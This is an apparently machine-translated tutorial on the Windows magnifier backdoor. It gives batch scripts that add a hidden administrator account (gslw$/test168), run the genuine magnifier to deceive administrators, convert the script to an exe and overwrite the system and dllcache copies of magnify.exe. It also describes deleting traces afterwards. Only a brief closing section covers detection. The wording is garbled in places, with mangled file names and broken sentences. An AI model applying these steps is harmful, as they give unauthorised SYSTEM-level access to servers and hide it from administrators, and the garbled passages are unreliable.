WINDOWS system backdoor instance 2

Magnifiers, the most tricky Backdoor

MagnifiersMagnify. Exe) is a small tool integrated with Windows 2000/XP/2003 systems. It is designed to help users with visual impairment. The tool can be used with the “win+u”combination before the user's guest system. For this reason, the attacker can replace the magnifier program with a file of the same name as magnify.exe, which is specially crafted to control the server.

In general, the attacker creates an administrator user through the magnify.exe program, and then logs on to the system. Of course, sometimes they will also pass through its direct call with the command line to indicate the system shellexplorer.exe ). It should be noted that the called programs are all system permissions, that is, the highest system permissions. However, in case the Administrator finds flaws when running the magnifier program, the attacker generally runs the real magnifier program to cheat the Administrator after completing the required operations through the constructor. The method is as follows:

1) construct a batch processing script

 
 

  
  
@echo off  
  
  
 
  
  
net user gslw$ test168 /add  
  
  
 
  
  
net localgroup administrators gslw$ /add  
  
  
 
  
  
%Windir%\system32\nagnify.exe  
  
  
 
  
  
exit 
 
 

. Figure 2)

2) File Format Conversion

Because the batch file magnify. bat is suffixed with bat, it must be converted to an exe file of the same name before it can be called through Win + U. Attackers can use WinRar to construct an automatically decompressed exe compressed file. Of course, they can also use bat2com and com2exe to convert the file format. Let's take the following method as an example.

Open the command line, enter the directory where the bat2com and com2exe tools are located, and then run the command "bat2com magnify. bat "will magnify. convert bat to magniy.com and run the "com2exe magniy.com.pdf" command to convert magniy.cominto magniy.exe. In this way, the batch file is converted into a program file with the same name as the magnifier program. Figure 3)

3) magnifier file replacement

Replacement, through which we can replace system files. In addition, because the system file is stored in % Windir % \ system32 \ dllcache, the file must be replaced with the magnify.exe file in the directory first. The pseudo-structure magnify.exe file is located in the % Windir % directory. We can use a batch to replace the file.

 
 

  
  
@echo off  
  
  
 
  
  
copy %Windir%\system32\dllcache\magnify.exe nagnify.exe  
  
  
 
  
  
copy %Windir%\system32\magnify.exe nagnify.exe  
  
  
 
  
  
replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache  
  
  
 
  
  
replace.exe %Windir%\magnify.exe %Windir%\system32  
  
  
 
  
  
exit 
 
 

The batch processing function is to first convert the magnifier program into nagnify.exe and then replace it with a constructor of the same name. Figure 4)

4) attack Exploitation

After completing the preceding operations, a magnifier backdoor is created. Then, the attacker connects to the server through the Remote Desktop, presses the Win + U key on the local keyboard in the logon interface window, and selects the magnifier to run ", at this moment, an administrator gslw $ is created on the server and the Magnifier tool is enabled. Then, attackers can log on to the server through this account. Of course, the attacker will delete all information related to the account before disconnecting the account to prevent the administrator from discovering it. Figure 5)
 

5) Preventive measures

Check whether the file icon of % Windir % \ system32 \ magnify.exe is the original magnifier icon. If not, a magnifier backdoor may be implanted. Of course, sometimes attackers will change the file icon to the same as that of the original magnifier program. Then we can modify the size and modification time of the magnify.exe file. If either of the two files does not match, we are skeptical.

You can also run magnify.exe and then run lusrmgr. msc to check whether there are any suspicious users. If you confirm that the server has a magnifier backdoor, you must first delete the file and restore the normal magnifier program. Of course, we can also do something more thoroughly and replace the magnifier program with an insignificant program. Even though we can use it to protect our lives, we can construct a magnify.exe, through which we can warn attackers or conduct intrusion monitoring and evidence collection.

.